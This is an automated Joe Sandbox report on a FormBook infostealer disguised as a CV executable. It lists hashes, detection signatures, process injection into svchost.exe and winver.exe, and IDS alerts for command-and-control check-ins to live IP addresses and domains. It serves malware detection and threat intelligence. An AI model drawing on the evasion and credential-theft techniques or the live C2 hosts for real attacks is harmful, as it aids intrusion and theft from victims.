Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CV Lic H&S Olivetti Renzo.exe

Overview

General Information

Sample name:CV Lic H&S Olivetti Renzo.exe
Analysis ID:1561737
MD5:12a282dc358949660691fbff8bcdf461
SHA1:c425cd4b512501453ec8f08f98983e5e02c6c614
SHA256:7ab6840afe0f8992a491db388b5225eea0ab7bad3a76be681e3344776070ce4d
Tags:exeFormbookuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CV Lic H&S Olivetti Renzo.exe (PID: 5568 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 12A282DC358949660691FBFF8BCDF461)
    • svchost.exe (PID: 3148 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • NObNfBLfyhvzeH.exe (PID: 2316 cmdline: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 3380 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • NObNfBLfyhvzeH.exe (PID: 2020 cmdline: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3924 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , CommandLine: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, NewProcessName: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, OriginalFileName: C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 3380, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe" , ProcessId: 2020, ProcessName: NObNfBLfyhvzeH.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 5568, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 3148, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 5568, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 3148, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:19:57.934086+010028554651A Network Trojan was detected192.168.2.54977513.248.221.24380TCP
                2024-11-24T08:20:23.425972+010028554651A Network Trojan was detected192.168.2.54983638.54.112.22780TCP
                2024-11-24T08:20:39.097696+010028554651A Network Trojan was detected192.168.2.54987547.76.213.19780TCP
                2024-11-24T08:20:54.303139+010028554651A Network Trojan was detected192.168.2.54991274.48.143.8280TCP
                2024-11-24T08:21:08.930320+010028554651A Network Trojan was detected192.168.2.54994813.248.169.4880TCP
                2024-11-24T08:21:24.655094+010028554651A Network Trojan was detected192.168.2.549987103.21.221.8780TCP
                2024-11-24T08:21:41.021032+010028554651A Network Trojan was detected192.168.2.5500008.210.46.2180TCP
                2024-11-24T08:21:55.677808+010028554651A Network Trojan was detected192.168.2.550004203.161.43.22880TCP
                2024-11-24T08:22:10.256688+010028554651A Network Trojan was detected192.168.2.55000813.248.169.4880TCP
                2024-11-24T08:22:25.056018+010028554651A Network Trojan was detected192.168.2.550012147.255.21.18780TCP
                2024-11-24T08:22:39.735023+010028554651A Network Trojan was detected192.168.2.550016172.67.159.6180TCP
                2024-11-24T08:22:54.926351+010028554651A Network Trojan was detected192.168.2.550020172.67.168.22880TCP
                2024-11-24T08:23:09.783841+010028554651A Network Trojan was detected192.168.2.550024194.58.112.17480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:20:15.190738+010028554641A Network Trojan was detected192.168.2.54981338.54.112.22780TCP
                2024-11-24T08:20:17.925091+010028554641A Network Trojan was detected192.168.2.54981938.54.112.22780TCP
                2024-11-24T08:20:20.628223+010028554641A Network Trojan was detected192.168.2.54982838.54.112.22780TCP
                2024-11-24T08:20:31.034448+010028554641A Network Trojan was detected192.168.2.54985247.76.213.19780TCP
                2024-11-24T08:20:33.690775+010028554641A Network Trojan was detected192.168.2.54985847.76.213.19780TCP
                2024-11-24T08:20:36.362609+010028554641A Network Trojan was detected192.168.2.54986847.76.213.19780TCP
                2024-11-24T08:20:46.351229+010028554641A Network Trojan was detected192.168.2.54989174.48.143.8280TCP
                2024-11-24T08:20:48.960155+010028554641A Network Trojan was detected192.168.2.54989774.48.143.8280TCP
                2024-11-24T08:20:51.617592+010028554641A Network Trojan was detected192.168.2.54990574.48.143.8280TCP
                2024-11-24T08:21:00.864255+010028554641A Network Trojan was detected192.168.2.54992713.248.169.4880TCP
                2024-11-24T08:21:03.597769+010028554641A Network Trojan was detected192.168.2.54993513.248.169.4880TCP
                2024-11-24T08:21:06.167057+010028554641A Network Trojan was detected192.168.2.54994213.248.169.4880TCP
                2024-11-24T08:21:16.566182+010028554641A Network Trojan was detected192.168.2.549965103.21.221.8780TCP
                2024-11-24T08:21:19.270132+010028554641A Network Trojan was detected192.168.2.549972103.21.221.8780TCP
                2024-11-24T08:21:21.941010+010028554641A Network Trojan was detected192.168.2.549980103.21.221.8780TCP
                2024-11-24T08:21:32.910270+010028554641A Network Trojan was detected192.168.2.5499978.210.46.2180TCP
                2024-11-24T08:21:35.644148+010028554641A Network Trojan was detected192.168.2.5499988.210.46.2180TCP
                2024-11-24T08:21:38.302174+010028554641A Network Trojan was detected192.168.2.5499998.210.46.2180TCP
                2024-11-24T08:21:47.613670+010028554641A Network Trojan was detected192.168.2.550001203.161.43.22880TCP
                2024-11-24T08:21:50.386226+010028554641A Network Trojan was detected192.168.2.550002203.161.43.22880TCP
                2024-11-24T08:21:53.080355+010028554641A Network Trojan was detected192.168.2.550003203.161.43.22880TCP
                2024-11-24T08:22:02.229431+010028554641A Network Trojan was detected192.168.2.55000513.248.169.4880TCP
                2024-11-24T08:22:04.920227+010028554641A Network Trojan was detected192.168.2.55000613.248.169.4880TCP
                2024-11-24T08:22:07.541345+010028554641A Network Trojan was detected192.168.2.55000713.248.169.4880TCP
                2024-11-24T08:22:17.018327+010028554641A Network Trojan was detected192.168.2.550009147.255.21.18780TCP
                2024-11-24T08:22:19.677568+010028554641A Network Trojan was detected192.168.2.550010147.255.21.18780TCP
                2024-11-24T08:22:22.390336+010028554641A Network Trojan was detected192.168.2.550011147.255.21.18780TCP
                2024-11-24T08:22:31.633087+010028554641A Network Trojan was detected192.168.2.550013172.67.159.6180TCP
                2024-11-24T08:22:34.380153+010028554641A Network Trojan was detected192.168.2.550014172.67.159.6180TCP
                2024-11-24T08:22:37.059844+010028554641A Network Trojan was detected192.168.2.550015172.67.159.6180TCP
                2024-11-24T08:22:46.817185+010028554641A Network Trojan was detected192.168.2.550017172.67.168.22880TCP
                2024-11-24T08:22:49.487701+010028554641A Network Trojan was detected192.168.2.550018172.67.168.22880TCP
                2024-11-24T08:22:52.143905+010028554641A Network Trojan was detected192.168.2.550019172.67.168.22880TCP
                2024-11-24T08:23:01.802045+010028554641A Network Trojan was detected192.168.2.550021194.58.112.17480TCP
                2024-11-24T08:23:04.440140+010028554641A Network Trojan was detected192.168.2.550022194.58.112.17480TCP
                2024-11-24T08:23:07.116769+010028554641A Network Trojan was detected192.168.2.550023194.58.112.17480TCP
                2024-11-24T08:23:16.435572+010028554641A Network Trojan was detected192.168.2.550025172.67.220.3680TCP
                2024-11-24T08:23:19.516006+010028554641A Network Trojan was detected192.168.2.550026172.67.220.3680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 63%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 50%Perma Link
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: CV Lic H&S Olivetti Renzo.exeJoe Sandbox ML: detected
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NObNfBLfyhvzeH.exe, 00000004.00000002.4525085376.000000000049E000.00000002.00000001.01000000.00000005.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4524587511.000000000049E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074535912.0000000004320000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.2074686910.00000000044C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2388466530.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2294584292.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2388466530.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2292435039.0000000003000000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000005.00000002.4526687543.00000000047FE000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000002.4526687543.0000000004660000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2388453751.00000000042D1000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000005.00000003.2390659558.00000000044B1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000002.00000003.2357425923.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2357366864.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000004.00000002.4525399562.00000000005F8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00106CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00106CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_001060DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_001063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_001063F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0010EB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F56F FindFirstFileW,FindClose,0_2_0010F56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_0010F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0010F5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00111C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00111F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00111F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 5_2_0036C740 FindFirstFileW,FindNextFileW,FindClose,5_2_0036C740
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then xor eax, eax5_2_00359E10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then mov ebx, 00000004h5_2_043704E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49819 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49775 -> 13.248.221.243:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49828 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49836 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49897 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49852 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49868 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49891 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49813 -> 38.54.112.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49875 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49965 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49912 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49858 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49935 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49948 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 172.67.220.36:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49927 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49942 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 172.67.159.61:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 194.58.112.174:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
